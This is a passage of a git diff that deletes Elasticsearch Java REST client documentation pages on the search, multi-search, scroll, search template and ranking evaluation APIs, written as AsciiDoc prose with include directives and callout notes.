populate them just like you -would for a regular <>. -<3> Add the `SearchTemplateRequest` to the `MultiSearchTemplateRequest`. - -===== Optional arguments - -The multiSearchTemplate's `max_concurrent_searches` request parameter can be used to control -the maximum number of concurrent searches the multi search api will execute. -This default is based on the number of data nodes and the default search thread pool size. - -[[java-rest-high-multi-search-template-sync]] -==== Synchronous Execution - -The `multiSearchTemplate` method executes `MultiSearchTemplateRequest`s synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-request-sync] --------------------------------------------------- - -[[java-rest-high-multi-search-template-async]] -==== Asynchronous Execution - -The `multiSearchTemplateAsync` method executes `MultiSearchTemplateRequest`s asynchronously, -calling the provided `ActionListener` when the response is ready. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-execute-async] --------------------------------------------------- -The parameters are the `MultiSearchTemplateRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `MultiSearchTemplateResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `MultiSearchTemplateRequest` fails. - -==== MultiSearchTemplateResponse - -The `MultiSearchTemplateResponse` that is returned by executing the `multiSearchTemplate` method contains -a `MultiSearchTemplateResponse.Item` for each `SearchTemplateRequest` in the -`MultiSearchTemplateRequest`. Each `MultiSearchTemplateResponse.Item` contains an -exception in `getFailure` if the request failed or a -<> in `getResponse` if -the request succeeded: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-template-response] --------------------------------------------------- -<1> An array of responses is returned - one response for each request -<2> Failed search template requests have error messages -<3> Successful requests contain a <> in -`getResponse`. diff --git a/docs/java-rest/high-level/search/multi-search.asciidoc b/docs/java-rest/high-level/search/multi-search.asciidoc deleted file mode 100644 index 205fe4bfe93..00000000000 --- a/docs/java-rest/high-level/search/multi-search.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[java-rest-high-multi-search]] -=== Multi-Search API - -The `multiSearch` API executes multiple <> -requests in a single http request in parallel. - -[[java-rest-high-multi-search-request]] -==== Multi-Search Request - -The `MultiSearchRequest` is built empty and you add all of the searches that -you wish to execute to it: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-request-basic] --------------------------------------------------- -<1> Create an empty `MultiSearchRequest`. -<2> Create an empty `SearchRequest` and populate it just like you -would for a regular <>. -<3> Add the `SearchRequest` to the `MultiSearchRequest`. -<4> Build a second `SearchRequest` and add it to the `MultiSearchRequest`. - -===== Optional arguments - -The `SearchRequest`s inside of `MultiSearchRequest` support all of -<>'s optional arguments. -For example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-request-indices] --------------------------------------------------- -<1> Restricts the request to an index - -[[java-rest-high-multi-search-sync]] -==== Synchronous Execution - -The `multiSearch` method executes `MultiSearchRequest`s synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-execute] --------------------------------------------------- - -[[java-rest-high-multi-search-async]] -==== Asynchronous Execution - -The `multiSearchAsync` method executes `MultiSearchRequest`s asynchronously, -calling the provided `ActionListener` when the response is ready. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-execute-async] --------------------------------------------------- -<1> The `MultiSearchRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `MultiSearchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `SearchRequest` fails. - -==== MultiSearchResponse - -The `MultiSearchResponse` that is returned by executing the `multiSearch` method contains -a `MultiSearchResponse.Item` for each `SearchRequest` in the -`MultiSearchRequest`. Each `MultiSearchResponse.Item` contains an -exception in `getFailure` if the request failed or a -<> in `getResponse` if -the request succeeded: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[multi-search-response] --------------------------------------------------- -<1> The item for the first search. -<2> It succeeded so `getFailure` returns null. -<3> And there is a <> in -`getResponse`. -<4> The item for the second search. diff --git a/docs/java-rest/high-level/search/rank-eval.asciidoc b/docs/java-rest/high-level/search/rank-eval.asciidoc deleted file mode 100644 index 195e1f92f3b..00000000000 --- a/docs/java-rest/high-level/search/rank-eval.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[java-rest-high-rank-eval]] -=== Ranking Evaluation API - -The `rankEval` method allows to evaluate the quality of ranked search -results over a set of search request. Given sets of manually rated -documents for each search request, ranking evaluation performs a -<> request and calculates -information retrieval metrics like _mean reciprocal rank_, _precision_ -or _discounted cumulative gain_ on the returned results. - -[[java-rest-high-rank-eval-request]] -==== Ranking Evaluation Request - -In order to build a `RankEvalRequest`, you first need to create an -evaluation specification (`RankEvalSpec`). This specification requires -to define the evaluation metric that is going to be calculated, as well -as a list of rated documents per search requests. Creating the ranking -evaluation request then takes the specification and a list of target -indices as arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-request-basic] --------------------------------------------------- -<1> Define the metric used in the evaluation -<2> Add rated documents, specified by index name, id and rating -<3> Create the search query to evaluate -<4> Combine the three former parts into a `RatedRequest` -<5> Create the ranking evaluation specification -<6> Create the ranking evaluation request - -[[java-rest-high-rank-eval-sync]] -==== Synchronous Execution - -The `rankEval` method executes `RankEvalRequest`s synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-execute] --------------------------------------------------- - -[[java-rest-high-rank-eval-async]] -==== Asynchronous Execution - -The `rankEvalAsync` method executes `RankEvalRequest`s asynchronously, -calling the provided `ActionListener` when the response is ready. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-execute-async] --------------------------------------------------- -<1> The `RankEvalRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `RankEvalResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `RankEvalRequest` fails. - -==== RankEvalResponse - -The `RankEvalResponse` that is returned by executing the request -contains information about the overall evaluation score, the -scores of each individual search request in the set of queries and -detailed information about search hits and details about the metric -calculation per partial result. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[rank-eval-response] --------------------------------------------------- -<1> The overall evaluation result -<2> Partial results that are keyed by their query id -<3> The metric score for each partial result -<4> Rated search hits contain a fully fledged `SearchHit` -<5> Rated search hits also contain an `Optional` rating that -is not present if the document did not get a rating in the request -<6> Metric details are named after the metric used in the request -<7> After casting to the metric used in the request, the -metric details offers insight into parts of the metric calculation \ No newline at end of file diff --git a/docs/java-rest/high-level/search/scroll.asciidoc b/docs/java-rest/high-level/search/scroll.asciidoc deleted file mode 100644 index 8285243103a..00000000000 --- a/docs/java-rest/high-level/search/scroll.asciidoc +++ /dev/null @@ -1,220 +0,0 @@ -[[java-rest-high-search-scroll]] -=== Search Scroll API - -The Scroll API can be used to retrieve a large number of results from -a search request. - -In order to use scrolling, the following steps need to be executed in the -given order. - - -==== Initialize the search scroll context - -An initial search request with a `scroll` parameter must be executed to -initialize the scroll session through the <>. -When processing this `SearchRequest`, Elasticsearch detects the presence of -the `scroll` parameter and keeps the search context alive for the -corresponding time interval. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-init] --------------------------------------------------- -<1> Create the `SearchRequest` and its corresponding `SearchSourceBuilder`. -Also optionally set the `size` to control how many results to retrieve at -a time. -<2> Set the scroll interval -<3> Read the returned scroll id, which points to the search context that's -being kept alive and will be needed in the following search scroll call -<4> Retrieve the first batch of search hits - -==== Retrieve all the relevant documents - -As a second step, the received scroll identifier must be set to a -`SearchScrollRequest` along with a new scroll interval and sent through the -`searchScroll` method. Elasticsearch returns another batch of results with -a new scroll identifier. This new scroll identifier can then be used in a -subsequent `SearchScrollRequest` to retrieve the next batch of results, -and so on. This process should be repeated in a loop until no more results are -returned, meaning that the scroll has been exhausted and all the matching -documents have been retrieved. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll2] --------------------------------------------------- -<1> Create the `SearchScrollRequest` by setting the required scroll id and -the scroll interval -<2> Read the new scroll id, which points to the search context that's -being kept alive and will be needed in the following search scroll call -<3> Retrieve another batch of search hits -<4> - -==== Clear the scroll context - -Finally, the last scroll identifier can be deleted using the <> -in order to release the search context. This happens automatically when the -scroll expires, but it's good practice to do it as soon as the scroll session -is completed. - -==== Optional arguments - -The following arguments can optionally be provided when constructing -the `SearchScrollRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[scroll-request-arguments] --------------------------------------------------- -<1> Scroll interval as a `TimeValue` -<2> Scroll interval as a `String` - -If no `scroll` value is set for the `SearchScrollRequest`, the search context will -expire once the initial scroll time expired (ie, the scroll time set in the -initial search request). - -[[java-rest-high-search-scroll-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-execute-sync] --------------------------------------------------- - -[[java-rest-high-search-scroll-async]] -==== Asynchronous Execution - -The asynchronous execution of a search scroll request requires both the `SearchScrollRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-execute-async] --------------------------------------------------- -<1> The `SearchScrollRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `SearchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-search-scroll-response]] -==== Response - -The search scroll API returns a `SearchResponse` object, same as the -Search API. - -[[java-rest-high-search-scroll-example]] -==== Full example - -The following is a complete example of a scrolled search. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-scroll-example] --------------------------------------------------- -<1> Initialize the search context by sending the initial `SearchRequest` -<2> Retrieve all the search hits by calling the Search Scroll api in a loop -until no documents are returned -<3> Process the returned search results -<4> Create a new `SearchScrollRequest` holding the last returned scroll -identifier and the scroll interval -<5> Clear the scroll context once the scroll is completed - -[[java-rest-high-clear-scroll]] -=== Clear Scroll API - -The search contexts used by the Search Scroll API are automatically deleted when the scroll -times out. But it is advised to release search contexts as soon as they are not -necessary anymore using the Clear Scroll API. - -[[java-rest-high-clear-scroll-request]] -==== Clear Scroll Request - -A `ClearScrollRequest` can be created as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-request] --------------------------------------------------- -<1> Create a new `ClearScrollRequest` -<2> Adds a scroll id to the list of scroll identifiers to clear - -==== Providing the scroll identifiers -The `ClearScrollRequest` allows to clear one or more scroll identifiers in a single request. - -The scroll identifiers can be added to the request one by one: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-add-scroll-id] --------------------------------------------------- - -Or all together using: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-add-scroll-ids] --------------------------------------------------- - -[[java-rest-high-clear-scroll-sync]] -==== Synchronous Execution - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-execute] --------------------------------------------------- - -[[java-rest-high-clear-scroll-async]] -==== Asynchronous Execution - -The asynchronous execution of a clear scroll request requires both the `ClearScrollRequest` -instance and an `ActionListener` instance to be passed to the asynchronous -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-execute-async] --------------------------------------------------- -<1> The `ClearScrollRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `ClearScrollResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument - -[[java-rest-high-clear-scroll-response]] -==== Clear Scroll Response - -The returned `ClearScrollResponse` allows to retrieve information about the released - search contexts: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[clear-scroll-response] --------------------------------------------------- -<1> Return true if the request succeeded -<2> Return the number of released search contexts diff --git a/docs/java-rest/high-level/search/search-template.asciidoc b/docs/java-rest/high-level/search/search-template.asciidoc deleted file mode 100644 index 3f0dfb8ab28..00000000000 --- a/docs/java-rest/high-level/search/search-template.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[[java-rest-high-search-template]] -=== Search Template API - -The search template API allows for searches to be executed from a template based -on the mustache language, and also for previewing rendered templates. - -[[java-rest-high-search-template-request]] -==== Search Template Request - -===== Inline Templates - -In the most basic form of request, the search template is specified inline: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-request-inline] --------------------------------------------------- -<1> The search is executed against the `posts` index. -<2> The template defines the structure of the search source. It is passed -as a string because mustache templates are not always valid JSON. -<3> Before running the search, the template is rendered with the provided parameters. - -===== Registered Templates - -Search templates can be registered in advance through stored scripts API. Note that -the stored scripts API is not yet available in the high-level REST client, so in this -example we use the low-level REST client. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[register-script] --------------------------------------------------- - -Instead of providing an inline script, we can refer to this registered template in the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-request-stored] --------------------------------------------------- - -===== Rendering Templates - -Given parameter values, a template can be rendered without executing a search: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[render-search-template-request] --------------------------------------------------- -<1> Setting `simulate` to `true` causes the search template to only be rendered. - -Both inline and pre-registered templates can be rendered. - -===== Optional Arguments - -As in standard search requests, the `explain` and `profile` options are supported: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-request-options] --------------------------------------------------- - -===== Additional References - -The {ref}/search-template.html[Search Template documentation] contains further examples of how search requests can be templated. - -[[java-rest-high-search-template-sync]] -==== Synchronous Execution - -The `searchTemplate` method executes the request synchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-execute] --------------------------------------------------- - -==== Asynchronous Execution - -A search template request can be executed asynchronously through the `searchTemplateAsync` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-execute-async] --------------------------------------------------- -<1> The `SearchTemplateRequest` to execute and the `ActionListener` to call when the execution completes. - -The asynchronous method does not block and returns immediately. Once the request completes, the -`ActionListener` is called back using the `onResponse` method if the execution completed successfully, -or using the `onFailure` method if it failed. - -A typical listener for `SearchTemplateResponse` is constructed as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. -<2> Called when the whole `SearchTemplateRequest` fails. - -==== Search Template Response - -For a standard search template request, the response contains a `SearchResponse` object -with the result of executing the search: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[search-template-response] --------------------------------------------------- - -If `simulate` was set to `true` in the request, then the response -will contain the rendered search source instead of a `SearchResponse`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SearchDocumentationIT.java[render-search-template-response] --------------------------------------------------- -<1> The rendered source in bytes, in our example `{"query": { "match" : { "title" : "elasticsearch" }}, "size" : 5}`. diff --git a/docs/java-rest/high-level/search/search.asciidoc b/docs/java-rest/high-level/search/search.asciidoc deleted file mode 100644 index ea439d7d419..00000000000 --- a/docs/java-rest/high-level/search/search.asciidoc +++ /dev/null @@ -1,464 +0,0 @@ --- -:api: search -:request: SearchRequest -:response: SearchResponse --- - -[id="{upid}-{api}"] -=== Search API - -[id="{upid}-{api}-request"] -==== Search Request - -The +{request}+ is used for any operation that has to do with searching -documents, aggregations, suggestions and also offers ways of requesting -highlighting on the resulting documents. - -In its most basic form, we can add a query to the request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-basic] --------------------------------------------------- - -<1> Creates the `SearchRequest`. Without arguments this runs against all indices. -<2> Most search parameters are added to the `SearchSourceBuilder`. It offers setters for everything that goes into the search request body. -<3> Add a `match_all` query to the `SearchSourceBuilder`. -<4> Add the `SearchSourceBuilder` to the `SearchRequest`. - -[id="{upid}-{api}-request-optional"] -===== Optional arguments - -Let's first look at some of the optional arguments of a +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indices] --------------------------------------------------- -<1> Restricts the request to an index - -There are a couple of other interesting optional parameters: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-routing] --------------------------------------------------- -<1> Set a routing parameter - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-indicesOptions] --------------------------------------------------- -<1> Setting `IndicesOptions` controls how unavailable indices are resolved and -how wildcard expressions are expanded - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-preference] --------------------------------------------------- -<1> Use the preference parameter e.g. to execute the search to prefer local -shards. The default is to randomize across shards. - -===== Using the SearchSourceBuilder - -Most options controlling the search behavior can be set on the -`SearchSourceBuilder`, -which contains more or less the equivalent of the options in the search request -body of the Rest API. - -Here are a few examples of some common options: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-basics] --------------------------------------------------- -<1> Create a `SearchSourceBuilder` with default options. -<2> Set the query. Can be any type of `QueryBuilder` -<3> Set the `from` option that determines the result index to start searching -from. Defaults to 0. -<4> Set the `size` option that determines the number of search hits to return. -Defaults to 10. -<5> Set an optional timeout that controls how long the search is allowed to -take. - -After this, the `SearchSourceBuilder` only needs to be added to the -+{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-setter] --------------------------------------------------- - -[id="{upid}-{api}-request-building-queries"] -===== Building queries - -Search queries are created using `QueryBuilder` objects. A `QueryBuilder` exists - for every search query type supported by Elasticsearch's {ref}/query-dsl.html[Query DSL]. - -A `QueryBuilder` can be created using its constructor: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-builder-ctor] --------------------------------------------------- -<1> Create a full text {ref}/query-dsl-match-query.html[Match Query] that matches -the text "kimchy" over the field "user". - -Once created, the `QueryBuilder` object provides methods to configure the options -of the search query it creates: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-builder-options] --------------------------------------------------- -<1> Enable fuzzy matching on the match query -<2> Set the prefix length option on the match query -<3> Set the max expansion options to control the fuzzy - process of the query - -`QueryBuilder` objects can also be created using the `QueryBuilders` utility class. -This class provides helper methods that can be used to create `QueryBuilder` objects - using a fluent programming style: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-builders] --------------------------------------------------- - -Whatever the method used to create it, the `QueryBuilder` object must be added -to the `SearchSourceBuilder` as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-setter] --------------------------------------------------- - -The <<{upid}-query-builders, Building Queries>> page gives a list of all available search queries with -their corresponding `QueryBuilder` objects and `QueryBuilders` helper methods. - - -===== Specifying Sorting - -The `SearchSourceBuilder` allows to add one or more `SortBuilder` instances. There are four special implementations (Field-, Score-, GeoDistance- and ScriptSortBuilder). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-sorting] --------------------------------------------------- -<1> Sort descending by `_score` (the default) -<2> Also sort ascending by `_id` field - -===== Source filtering - -By default, search requests return the contents of the document `_source` but like in the Rest API you can overwrite this behavior. For example, you can turn off `_source` retrieval completely: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-filtering-off] --------------------------------------------------- - -The method also accepts an array of one or more wildcard patterns to control which fields get included or excluded in a more fine grained way: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-filtering-includes] --------------------------------------------------- - -[id="{upid}-{api}-request-highlighting"] -===== Requesting Highlighting - -Highlighting search results can be achieved by setting a `HighlightBuilder` on the -`SearchSourceBuilder`. Different highlighting behaviour can be defined for each -fields by adding one or more `HighlightBuilder.Field` instances to a `HighlightBuilder`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-highlighting] --------------------------------------------------- -<1> Creates a new `HighlightBuilder` -<2> Create a field highlighter for the `title` field -<3> Set the field highlighter type -<4> Add the field highlighter to the highlight builder - -There are many options which are explained in detail in the Rest API documentation. The Rest -API parameters (e.g. `pre_tags`) are usually changed by -setters with a similar name (e.g. `#preTags(String ...)`). - -Highlighted text fragments can <<{upid}-{api}-response-highlighting,later be retrieved>> from the +{response}+. - -[id="{upid}-{api}-request-building-aggs"] -===== Requesting Aggregations - -Aggregations can be added to the search by first creating the appropriate -`AggregationBuilder` and then setting it on the `SearchSourceBuilder`. In the -following example we create a `terms` aggregation on company names with a -sub-aggregation on the average age of employees in the company: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations] --------------------------------------------------- - -The <<{upid}-aggregation-builders, Building Aggregations>> page gives a list of all available aggregations with -their corresponding `AggregationBuilder` objects and `AggregationBuilders` helper methods. - -We will later see how to <<{upid}-{api}-response-aggs,access aggregations>> in the +{response}+. - -===== Requesting Suggestions - -To add Suggestions to the search request, use one of the `SuggestionBuilder` implementations -that are easily accessible from the `SuggestBuilders` factory class. Suggestion builders -need to be added to the top level `SuggestBuilder`, which itself can be set on the `SearchSourceBuilder`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-suggestion] --------------------------------------------------- -<1> Creates a new `TermSuggestionBuilder` for the `user` field and -the text `kmichy` -<2> Adds the suggestion builder and names it `suggest_user` - -We will later see how to <<{upid}-{api}-response-suggestions,retrieve suggestions>> from the -+{response}+. - -===== Profiling Queries and Aggregations - -The {ref}/search-profile.html[Profile API] can be used to profile the execution of queries and aggregations for -a specific search request. in order to use it, the profile flag must be set to true on the `SearchSourceBuilder`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-profiling] --------------------------------------------------- - -Once the +{request}+ is executed the corresponding +{response}+ will -<<{upid}-{api}-response-profile,contain the profiling results>>. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== {response} - -The +{response}+ that is returned by executing the search provides details -about the search execution itself as well as access to the documents returned. -First, there is useful information about the request execution itself, like the -HTTP status code, execution time or whether the request terminated early or timed -out: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-1] --------------------------------------------------- - -Second, the response also provides information about the execution on the -shard level by offering statistics about the total number of shards that were -affected by the search, and the successful vs. unsuccessful shards. Possible -failures can also be handled by iterating over an array off -`ShardSearchFailures` like in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-2] --------------------------------------------------- - -[id="{upid}-{api}-response-search-hits"] -===== Retrieving SearchHits - -To get access to the returned documents, we need to first get the `SearchHits` -contained in the response: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-get] --------------------------------------------------- - -The `SearchHits` provides global information about all hits, like total number -of hits or the maximum score: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-info] --------------------------------------------------- - -Nested inside the `SearchHits` are the individual search results that can -be iterated over: - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-singleHit] --------------------------------------------------- - -The `SearchHit` provides access to basic information like index, document ID -and score of each search hit: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-singleHit-properties] --------------------------------------------------- - -Furthermore, it lets you get back the document source, either as a simple -JSON-String or as a map of key/value pairs. In this map, regular fields -are keyed by the field name and contain the field value. Multi-valued fields are -returned as lists of objects, nested objects as another key/value map. These -cases need to be cast accordingly: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-hits-singleHit-source] --------------------------------------------------- - -[id="{upid}-{api}-response-highlighting"] -===== Retrieving Highlighting - -If <<{upid}-{api}-request-highlighting,requested>>, highlighted text fragments can be retrieved from each `SearchHit` in the result. The hit object offers -access to a map of field names to `HighlightField` instances, each of which contains one -or many highlighted text fragments: - - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-highlighting-get] --------------------------------------------------- -<1> Get the highlighting for the `title` field -<2> Get one or many fragments containing the highlighted field content - -[id="{upid}-{api}-response-aggs"] -===== Retrieving Aggregations - -Aggregations can be retrieved from the +{response}+ by first getting the -root of the aggregation tree, the `Aggregations` object, and then getting the -aggregation by name. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations-get] --------------------------------------------------- -<1> Get the `by_company` terms aggregation -<2> Get the buckets that is keyed with `Elastic` -<3> Get the `average_age` sub-aggregation from that bucket - -Note that if you access aggregations by name, you need to specify the -aggregation interface according to the type of aggregation you requested, -otherwise a `ClassCastException` will be thrown: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[search-request-aggregations-get-wrongCast] --------------------------------------------------- -<1> This will throw an exception because "by_company" is a `terms` aggregation -but we try to retrieve it as a `range` aggregation - -It is also possible to access all aggregations as a map that is keyed by the -aggregation name. In this case, the cast to the proper aggregation interface -needs to happen explicitly: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations-asMap] --------------------------------------------------- - -There are also getters that return all top level aggregations as a list: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations-asList] --------------------------------------------------- - -And last but not least you can iterate over all aggregations and then e.g. -decide how to further process them based on their type: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-aggregations-iterator] --------------------------------------------------- - -[id="{upid}-{api}-response-suggestions"] -===== Retrieving Suggestions - -To get back the suggestions from a +{response}+, use the `Suggest` object as an entry point and then retrieve the nested suggestion objects: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-suggestion-get] --------------------------------------------------- -<1> Use the `Suggest` class to access suggestions -<2> Suggestions can be retrieved by name. You need to assign them to the correct -type of Suggestion class (here `TermSuggestion`), otherwise a `ClassCastException` is thrown -<3> Iterate over the suggestion entries -<4> Iterate over the 